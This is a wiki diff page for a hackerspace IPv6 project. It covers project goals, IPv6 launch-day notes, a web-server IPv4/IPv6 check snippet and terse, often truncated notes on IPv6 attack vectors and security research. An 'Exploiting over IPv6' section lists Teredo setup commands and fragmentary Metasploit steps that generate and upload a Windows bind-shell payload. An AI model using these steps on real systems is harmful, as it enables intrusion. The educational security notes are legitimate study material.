project:ipv6:start
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revisionLast revisionBoth sides next revision | ||
project:ipv6 [2012/05/30 05:13] – [Goals of the Project] ruza | project:ipv6:start [2016/11/28 02:23] – ruza | ||
---|---|---|---|
Line 1: | Line 1: | ||
+ | ====== IPv6 ====== | ||
+ | {{template>: | ||
+ | name=IPv6| | ||
+ | image=ipv6.png? | ||
+ | sw=| | ||
+ | founder=[[user: | ||
+ | interested=[[user: | ||
+ | status=active}} | ||
+ | |||
+ | ~~META: | ||
+ | status = active | ||
+ | & | ||
+ | ~~ | ||
+ | |||
+ | ===== Goals of the Project ===== | ||
+ | |||
+ | * [[wp> | ||
+ | * education | ||
+ | * security research related to IPv6 | ||
+ | ===== Status and Plan ===== | ||
+ | |||
+ | The project is currently in the planning stage. | ||
+ | |||
+ | * [DONE] our website http:// | ||
+ | |||
+ | ==== World IPv6 day (8 June 2011) ==== | ||
+ | |||
+ | * [DONE] we participate in World IPv6 day | ||
+ | [[http:// | ||
+ | |||
+ | ==== World IPv6 launch (6 June 2012) ==== | ||
+ | |||
+ | [[http:// | ||
+ | |||
+ | ==== 6or4 checkicon guy for your website ==== | ||
+ | |||
+ | Check your web server support [[https:// | ||
+ | |||
+ | <code apache / | ||
+ | SetEnvIf Server_Addr " | ||
+ | </ | ||
+ | |||
+ | <code bash> | ||
+ | wget -4 http:// | ||
+ | wget -6 http:// | ||
+ | </ | ||
+ | |||
+ | <code html index.html> | ||
+ | <!--#if expr=" | ||
+ | < | ||
+ | < | ||
+ | </ | ||
+ | ===== Topics (attack vectors) ===== | ||
+ | |||
+ | ==== Introduction to IPv6 ==== | ||
+ | |||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | * [[https:// | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | |||
+ | ==== IPv6 Addressing Architecture ==== | ||
+ | |||
+ | * The address notation for IPv6 is a group of 16 2-digit hexadecimal numbers, separated with a ':', | ||
+ | * "::" | ||
+ | * Special addresses are ::1 for loopback | ||
+ | * :: | ||
+ | * fe00::0/8 ip6-localnet | ||
+ | * ff00::0 ip6-mcastprefix | ||
+ | * fe80::/10 individuální lokální linkové | ||
+ | |||
+ | * broadcast -> multicast | ||
+ | |||
+ | Finding IPv6 hosts | ||
+ | * DNS (highly dependent), server logs | ||
+ | * MAC address allocations (EUI-64 standard) | ||
+ | |||
+ | * DoS targets [[http:// | ||
+ | * 3 site-local multicast addresses | ||
+ | * FF05::2 all-routers | ||
+ | * FF05::FB mDNSv6 | ||
+ | * FF05::1:3 all DHCP servers | ||
+ | * Several link-local multicast addresses | ||
+ | * FF02::1 all nodes | ||
+ | * FF02::2 all routers | ||
+ | * FF02::F all UPnP | ||
+ | * ... (RFCs :?:) | ||
+ | * Some deprecated (RFC 3879) site-local addresses but still used | ||
+ | * FEC0: | ||
+ | |||
+ | http:// | ||
+ | |||
+ | ==== IPv6 Header Fields ==== | ||
+ | * [[https:// | ||
+ | ==== IPv6 Extension Headers ==== | ||
+ | * unlimited size of header chain DoS aka Routing header DoS vs RFC 5095 | ||
+ | |||
+ | ==== IPv6 Privacy Extensions (RFC 3041) ==== | ||
+ | * temporary address for host client application (eg. www browser) | ||
+ | * random 64bit ID | ||
+ | * can be disabled by Group POlicy Object (win) or DHCP | ||
+ | |||
+ | ==== IPv6 Options ==== | ||
+ | ==== IPsec ==== | ||
+ | * IPsec not required by IPv6 | ||
+ | * blinds IPS, firewalls, ACLs | ||
+ | * network security relies more on endpoint security! | ||
+ | * DoS, malformed packets, spoofed and unprotected IKE messages (ICSA Labs methology) | ||
+ | ==== Internet Control Message Protocol version 6 (ICMPv6) ==== | ||
+ | * more relied upon | ||
+ | * moar types | ||
+ | |||
+ | ==== Neighbor Discovery for IPv6 ==== | ||
+ | * NDP replaces ARP | ||
+ | * not authenticated | ||
+ | * static entries overwritten by dynamic ones | ||
+ | * SEND (SEcure Neighbor Discovery) | ||
+ | ==== Multicast Listener Discovery ==== | ||
+ | ==== Mobility (RFC 3775) ==== | ||
+ | |||
+ | * http:// | ||
+ | * IPSEC VPN over IPv6 called [[http:// | ||
+ | |||
+ | |||
+ | ==== Address Auto-configuration ==== | ||
+ | * stateles (SLAAC) | ||
+ | * rogue Router Advertisement (DoS, MiTM) | ||
+ | * fe80:: (local link) + MAC (EUI-64) | ||
+ | * statefull DHCPv6, RFC 3315 | ||
+ | |||
+ | ==== Dynamic Host Configuration Protocol version 6 (DHCPv6) ==== | ||
+ | ==== Application support for IPv6 ==== | ||
+ | * [[http:// | ||
+ | |||
+ | ==== IPv6 firewalls ==== | ||
+ | * ipv6 default policy allowed, not inspected | ||
+ | * imany icmp6 types needs to be allowed too | ||
+ | * how to build and maintain antispam reputation databases? | ||
+ | * fragmentation and reassembly is done only by the end system | ||
+ | |||
+ | ==== Transition/ | ||
+ | ==== Security Implications of IPv6 on IPv4-only networks ==== | ||
+ | * running teredo/ | ||
+ | * [[wp> | ||
+ | |||
+ | ==== Exploiting over IPv6 ==== | ||
+ | * [[http:// | ||
+ | * you dont want that miredo service start everytime (update-rc.d -f miredo remove). | ||
+ | * Faking IP address FIXME | ||
+ | |||
+ | === Windows === | ||
+ | int ipv6 install | ||
+ | netsh int ipv6 set teredo [enterpriseclient|client] # | ||
+ | netsh int ipv6 show teredo # we need qualified State | ||
+ | | ||
+ | msfpayload windows/ | ||
+ | upload bind.exe | ||
+ | msf exploit(handler) > set PAYLOAD windows/ | ||
+ | | ||
+ | [[http:// | ||
+ | |||
+ | ==== IPv6 implementation (network devices testing) ==== | ||
+ | * [[wp> | ||
+ | * [[http:// | ||
+ | |||
+ | ===== Papers, books ===== | ||
+ | |||
+ | * [[http:// | ||
+ | van Hauser, THC]] | ||
+ | * [[http:// | ||
+ | * 39. Europen.cz, sbornik | ||
+ | * Cisco-Press-IPv6-Security-2009.pdf (@data) | ||
+ | * Cisco.Press.IPv6.for.Enterprise.Networks.Mar.2011.pdf (@data) | ||
+ | * Implementace_IPv6-CZNIC_academy.pdf (@data), [[http:// | ||
+ | * [[http:// | ||
+ | |||
+ | ===== Links ===== | ||
+ | |||
+ | * [[https:// | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | * telnet -6 towel.blinkenlights.nl | ||
+ | |||
+ | ===== Tools ===== | ||
+ | |||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
+ | * [[http:// | ||
project/ipv6/start.txt · Last modified: 2016/11/28 03:28 by ruza